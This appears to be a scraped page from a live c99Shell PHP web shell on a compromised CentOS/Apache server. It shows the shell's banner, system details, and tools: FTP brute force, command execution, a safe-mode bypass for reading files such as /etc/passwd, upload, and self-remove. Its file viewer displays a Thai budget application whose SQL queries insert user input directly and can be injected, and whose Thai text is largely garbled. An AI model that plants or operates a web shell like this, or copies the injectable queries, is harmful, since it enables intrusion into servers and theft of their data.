110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/ drwxr-xr-x Free 52.61 GB of 127.8 GB (41.17%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/ drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: TrainingShow.php (12.44 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
		
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2 = "project_type_tb";
		$myTable3 = "projectstdplan_tb";
		$myTalbleOrder = "Orderlist";
		
		$myTableField1 = "Orderlist";
		$myTableField2 = "Project_plan";
		$myTableField3 = "Faculty_code";
		
		
		
		$query = " SELECT *  FROM $myTable2  Where  Budget_Year='$Budget_Year'  and   Flag='Y'  ";
		$result0 = $dbObj->execQuery($query);
		$rs0 = $dbObj->fetchArray($result0);
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 20; }

		/**  Searching */
		$keyword = trim( $_REQUEST['keyword'] );
		$selectType = $_REQUEST['selectType'];
		
	  /*  Parameters  **/
		$params = "Budget_Year=$Budget_Year&Flag=$Flag";


		/**  Config Paging  */
		if($perpage == "") $limit = $_Config_limit;
		else $limit = $perpage;
		
		$scroll = $_Config_scroll; 
		
		
		/**  µСй§¤иТ Default КУЛГСєЎТГ·У Order By  */
		if( $OrderBy == "" ) { $OrderBy = $myTalbleOrder; }
						
		if( !isset($_GET['ASCDESC']) ) { $ASCDESC = "ASC"; }
						
		if( $_GET['ASCDESC'] == "ASC" ) { $ASCDESC = "DESC"; } 
		elseif( $_GET['ASCDESC'] == "DESC" ) { $ASCDESC = "ASC"; }
		
		/**  Query аѕЧиНЛТ Numrows ЎиН№  */
		if( $keyword != "" ){
			$query = "SELECT * FROM project_type_tb LEFT JOIN faculty_tb ON project_type_tb.Faculty_code = faculty_tb.Faculty_code LEFT JOIN money_source_tb ON project_type_tb.MoneyS_C = money_source_tb.MoneyS_C WHERE  Budget_Year = '$Budget_Year' AND Flag = 'Y' and (Orderlist LIKE '%$keyword%' OR Project_plan LIKE '%$keyword%') ORDER BY Orderlist";					
		} 
		else {
			$query = "SELECT * FROM project_type_tb LEFT JOIN faculty_tb ON project_type_tb.Faculty_code = faculty_tb.Faculty_code LEFT JOIN money_source_tb ON project_type_tb.MoneyS_C = money_source_tb.MoneyS_C WHERE Budget_Year='$Budget_Year' AND Flag='Y' ORDER BY Orderlist";
		}
		
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = (!isset ($_GET['page'])) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);		
} # else
 ?>









	

ўйНБЩЕЅиТВєГФЛТГ : ГТВ§Т№єШ¤ЕТЎГ - ЁУ№З№¤ГШАСі±м ЁУб№ЎµТБГТВЛ№иЗВ§Т№ - ўйНБЩЕ¤ГШАСі±мЛ№иЗВ§Т№




  
          
      
	  
                 
          
            
			              
              
                 ‹ ВйН№ЎЕСє
              
              
                ¤й№ЛТ 
                  "/>
                  
              
            
			
          
          
            
               0 ) { ?>
              
                
                
                  ·Сй§ЛБґ: 
                    
                     ГТВЎТГ
                   
                  
              
              fetchArray($result) ) { 
					
						if( $keyword != "" ) {
							$Orderlist = eregi_replace( $keyword, "\\0", $rs['Orderlist'] );
							$Project_plan = eregi_replace( $keyword, "\\0", $rs['Project_plan'] );
						} else {
							$Orderlist = $rs['Orderlist'];
							$Project_plan = $rs['Project_plan'];
						}
					
						$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				?>
						
                
                   ўйН
                  ГТВЎТГв¤Г§ЎТГ/ЎФЁЎГГБґйТ№ЎТГѕСІ№Тµ№аН§
                  ЛБЗґа§Ф№
                  ЁУ№З№а§Ф№

                    ·ХиЁиТВЁГФ§
                  
                
							","","","","","" )'> 	
							
							  
						 
							execQuery($sql4);
				$rs4 = $dbObj->fetchArray($result4);
				$dbObj->freeresult($result4);
					echo number_format($rs4['SumB2'],2,'.',','); 
			?>
							  
						
                
                
              
              
                
                  
                     0 ) { ?>
                    
                      
                        
                        
                      
                        Л№йТ: 
                           1) {	
                            $previous = $display - 1;					
                    ?>
bool(false)


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--